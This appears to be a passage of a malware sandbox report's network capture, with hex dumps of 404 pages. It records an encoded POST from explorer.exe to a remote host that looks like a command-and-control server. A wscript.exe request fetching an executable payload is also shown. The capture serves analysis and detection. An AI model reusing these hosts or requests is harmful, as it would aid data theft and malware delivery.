                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                    Jan 30, 2023 13:40:42.128768921 CET780INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                    Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                    Jan 30, 2023 13:40:42.128793955 CET781INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                    Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                    Jan 30, 2023 13:40:42.128820896 CET782INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                    Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                    Jan 30, 2023 13:40:42.128945112 CET783INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                    Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    9192.168.2.649729184.94.215.9180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:44.578386068 CET785OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.teammart.online
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.teammart.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.teammart.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 37 58 64 4b 6f 67 6e 31 44 77 57 69 48 66 64 69 65 7a 6a 6a 78 2d 38 38 69 4c 31 66 78 58 62 36 46 58 68 41 69 4b 6d 57 4e 4f 43 48 63 57 5a 75 62 37 69 54 54 4b 55 70 7e 53 46 65 71 69 6c 72 79 57 59 38 56 61 70 32 52 50 44 57 63 33 44 7a 6c 68 65 35 48 34 70 79 71 79 62 35 69 64 52 35 78 56 7a 51 6e 36 52 6a 32 7a 68 31 6a 65 31 53 4a 67 4a 53 42 49 28 76 4a 6f 43 6e 47 67 6e 76 65 47 7a 4e 7e 71 4e 74 4d 65 5a 6a 47 66 73 4b 75 35 61 74 47 62 67 6c 28 58 79 31 64 42 6d 39 50 5f 30 73 7e 56 42 41 6d 73 34 4e 30 30 43 42 71 38 36 70 43 6b 34 4a 5a 77 6c 46 78 4b 38 6a 37 6b 38 7a 58 78 6d 55 72 35 7e 70 41 6a 35 50 6f 6d 6e 31 56 4c 79 32 5a 54 4e 59 63 33 73 33 35 6b 64 4d 58 31 47 57 57 50 62 34 45 62 42 46 79 58 68 52 66 59 48 67 62 70 6a 43 58 32 35 5f 53 42 43 39 70 50 77 4e 46 4f 53 6c 45 48 42 49 64 6d 72 4b 62 41 74 47 46 56 72 45 58 6d 74 47 51 6a 58 49 63 6c 50 57 43 76 6b 49 79 46 69 61 69 61 34 64 68 55 43 72 70 54 4b 56 5a 6e 75 78 43 76 5a 6d 34 70 79 58 62 7a 48 2d 53 65 55 59 71 6c 38 57 28 72 70 6d 4c 5f 6a 71 65 78 5a 74 41 50 67 66 75 52 63 30 79 55 49 58 66 78 31 6e 34 6f 4a 30 37 4e 6e 5a 6d 74 76 34 6e 4e 6b 6a 31 6b 75 34 70 68 4e 4e 43 66 33 69 73 69 30 55 4a 6d 77 5f 37 4c 6c 50 65 70 46 53 47 61 32 78 51 76 4c 6e 6e 67 58 55 31 41 77 68 5a 54 55 65 56 69 71 38 49 68 57 55 4b 74 37 30 4b 6b 4b 32 4a 66 61 46 38 42 79 56 38 78 77 5a 59 49 45 78 32 46 48 44 68 5a 68 45 47 57 4a 39 61 7a 69 63 67 34 70 41 67 6c 45 57 45 38 50 6f 6e 44 6c 65 74 33 7e 32 58 76 71 4f 78 37 69 6c 52 73 74 30 37 6a 6d 6b 4d 68 76 7a 79 4b 39 32 73 45 67 37 56 54 36 54 38 2d 5a 2d 65 47 6e 56 39 51 75 4c 73 6e 51 34 4c 6c 69 62 30 51 62 31 75 53 38 63 30 33 76 59 67 52 7a 70 56 73 47 73 72 39 6d 59 76 76 6b 36 52 30 78 31 67 33 6b 41 71 6b 49 66 31 6c 65 6e 4b 4a 65 48 31 52 77 32 6b 45 71 77 69 6d 65 5f 5a 52 35 68 44 44 56 33 72 38 77 63 71 71 51 66 6f 69 37 72 66 42 65 4c 31 71 76 70 42 51 7e 74 61 72 79 75 31 6b 5a 59 4d 52 4f 67 39 4d 36 52 49 45 78 4f 66 36 6d 57 76 70 69 74 31 74 30 48 56 38 77 39 45 4c 71 6a 44 6c 6f 56 32 4e 35 42 64 44 5a 39 5a 43 4b 68 6d 32 50 6e 7a 77 4e 54 4e 2d 34 4b 4c 43 73 2d 52 56 6e 6d 63 51 49 39 4b 56 32 44 36 44 35 35 4c 6b 6f 4a 6b 76 6e 43 77 68 73 79 65 32 30 43 36 48 50 63 62 55 6f 38 46 61 28 41 41 5f 4b 6f 55 52 33 37 56 75 4f 5a 4d 34 6a 66 65 70 6b 70 66 46 58 50 70 42 4e 74 46 4e 31 38 50 77 54 72 30 50 72 62 30 5f 79 46 75 77 5a 43 30 74 57 34 71 74 49 4a 4f 46 67 46 56 73 6c 79 56 4a 56 45 52 41 33 59 4f 37 59 53 52 6f 75 6b 56 57 43 6e 28 36 49 72 32 4d 6d 69 7e 77 50 53 51 75 39 79 4b 66 48 2d 53 51 74 6c 30 36 69 6f 5a 44 31 5a 77 49 28 38 53 62 65 75 58 49 6c 59 79 78 79 73 4e 63 53 53 53 7a 7a 43 55 4a 7a 37 48 63 37 30 57 49 36 6a 30 59 47 55 36 66 58 77 57 67 6e 2d 57 5a 46 2d 49 63 31 4f 6b 6f 7e 41 56 73 39 56 78 5f 68 69 39 7a 51 76 32 6a 75 4b 33 78 74 5a 72 33 66 70 65 46 31 70 55 46 62 57 6c 38 79 69 42 48 30 6d 48 34 31 41 4d 56 53 48 57 6e 4f 2d 78 69 35 41 79 76 59 4f 78 6f 78 32 4e 42 31 44 68 43 75 33 76 6c 67 37 6d 6d 5a 68 57 70 79 46 62 6f 76 50 70 53 44 78 32 55 45 6e 61 31 63 63 6e 52 49 54 57 5f 57 57 41 7a 43 53 49 39 50 4d 63 6b 41 66 53 78 53 51 31 57 63 79 6c 6f 47 78 58 65 4a 41 58 36 39 41 48 34 41 4b 6b 59 65 70 28 30 7a 32 7e 64 6a 4d 4e 44 5a 4e 6d 35 69 52 57 7a 62 30 61 2d 7a 53 57 56 78 76 50 39 79 34 7e 71 61 6e 61 61 73 77 54 74 76 58 4d 67 6f 6f 51 63 59 45 31 66 48 37 6c 79 7e 4f 28 78 37 46 65 4a 36 6c 7e 41 43 45 48 69 45 4a 74 69 5a 43 32 50 63 6d 7e 61 58 30 78 47 62 55 34 76 73 55 48 62 6c 53 5a 49 77 5f 57 65 35 6e 45 52 59 51 28 6f 79 4e 66 78 4d 6a 66 5f 50 58 6a 56 4a 54 71 6f 38 6f 6d 78 59 62 42 72 4c 38 63 37 47 59 36 63 35 45 37 77 6f 77 56 79 79 48 31 46 75 71 71 6d 36 57 30 31 78 53 64 39 33 70 39 76 4a 44 61 33 54 7a 70 63 73 46 4e 6a 51 79 28 5f 49 5f 61 51 54 55 44 39 30 79 4e 68 61 73 59 63 7e 4b 39 4b 64 6d 4c 43 44 30 30 6c 71 59 62 58 52 35 58 43 6b 34 43 4b 32 32 28 70 78 5a 46 70 4e 71 6a 41 57 47 38 42 38 4a 31 4e 79 79 6c 68 79 69 71 73 73 4f 6c 6d 51 6d
                                                    Data Ascii: vG=1bSqDFR5OvcN7XdKogn1DwWiHfdiezjjx-88iL1fxXb6FXhAiKmWNOCHcWZub7iTTKUp~SFeqilryWY8Vap2RPDWc3Dzlhe5H4pyqyb5idR5xVzQn6Rj2zh1je1SJgJSBI(vJoCnGgnveGzN~qNtMeZjGfsKu5atGbgl(Xy1dBm9P_0s~VBAms4N00CBq86pCk4JZwlFxK8j7k8zXxmUr5~pAj5Pomn1VLy2ZTNYc3s35kdMX1GWWPb4EbBFyXhRfYHgbpjCX25_SBC9pPwNFOSlEHBIdmrKbAtGFVrEXmtGQjXIclPWCvkIyFiaia4dhUCrpTKVZnuxCvZm4pyXbzH-SeUYql8W(rpmL_jqexZtAPgfuRc0yUIXfx1n4oJ07NnZmtv4nNkj1ku4phNNCf3isi0UJmw_7LlPepFSGa2xQvLnngXU1AwhZTUeViq8IhWUKt70KkK2JfaF8ByV8xwZYIEx2FHDhZhEGWJ9azicg4pAglEWE8PonDlet3~2XvqOx7ilRst07jmkMhvzyK92sEg7VT6T8-Z-eGnV9QuLsnQ4Llib0Qb1uS8c03vYgRzpVsGsr9mYvvk6R0x1g3kAqkIf1lenKJeH1Rw2kEqwime_ZR5hDDV3r8wcqqQfoi7rfBeL1qvpBQ~taryu1kZYMROg9M6RIExOf6mWvpit1t0HV8w9ELqjDloV2N5BdDZ9ZCKhm2PnzwNTN-4KLCs-RVnmcQI9KV2D6D55LkoJkvnCwhsye20C6HPcbUo8Fa(AA_KoUR37VuOZM4jfepkpfFXPpBNtFN18PwTr0Prb0_yFuwZC0tW4qtIJOFgFVslyVJVERA3YO7YSRoukVWCn(6Ir2Mmi~wPSQu9yKfH-SQtl06ioZD1ZwI(8SbeuXIlYyxysNcSSSzzCUJz7Hc70WI6j0YGU6fXwWgn-WZF-Ic1Oko~AVs9Vx_hi9zQv2juK3xtZr3fpeF1pUFbWl8yiBH0mH41AMVSHWnO-xi5AyvYOxox2NB1DhCu3vlg7mmZhWpyFbovPpSDx2UEna1ccnRITW_WWAzCSI9PMckAfSxSQ1WcyloGxXeJAX69AH4AKkYep(0z2~djMNDZNm5iRWzb0a-zSWVxvP9y4~qanaaswTtvXMgooQcYE1fH7ly~O(x7FeJ6l~ACEHiEJtiZC2Pcm~aX0xGbU4vsUHblSZIw_We5nERYQ(oyNfxMjf_PXjVJTqo8omxYbBrL8c7GY6c5E7wowVyyH1Fuqqm6W01xSd93p9vJDa3TzpcsFNjQy(_I_aQTUD90yNhasYc~K9KdmLCD00lqYbXR5XCk4CK22(pxZFpNqjAWG8B8J1NyylhyiqssOlmQmTXw5FdXyuMz6EyMYWCHX0ur3XK5HwKi-5K6VZjAiNndIr8OT1z6Q(6aml_s93hQh7_NxQ_OYWDCI(Uo9fzeYBqY.
                                                    Jan 30, 2023 13:40:44.859843016 CET786INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:40:44 GMT
                                                    Server: Apache
                                                    Content-Length: 5278
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                    Jan 30, 2023 13:40:44.859882116 CET788INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                    Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                    Jan 30, 2023 13:40:44.859901905 CET789INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                    Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                    Jan 30, 2023 13:40:44.859924078 CET790INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                    Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                    Jan 30, 2023 13:40:44.862633944 CET791INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                    Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.64971491.227.138.48443C:\Windows\System32\wscript.exe
                                                    TimestampkBytes transferredDirectionData
                                                    2023-01-30 12:39:22 UTC0OUTGET /ti/HBhG.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
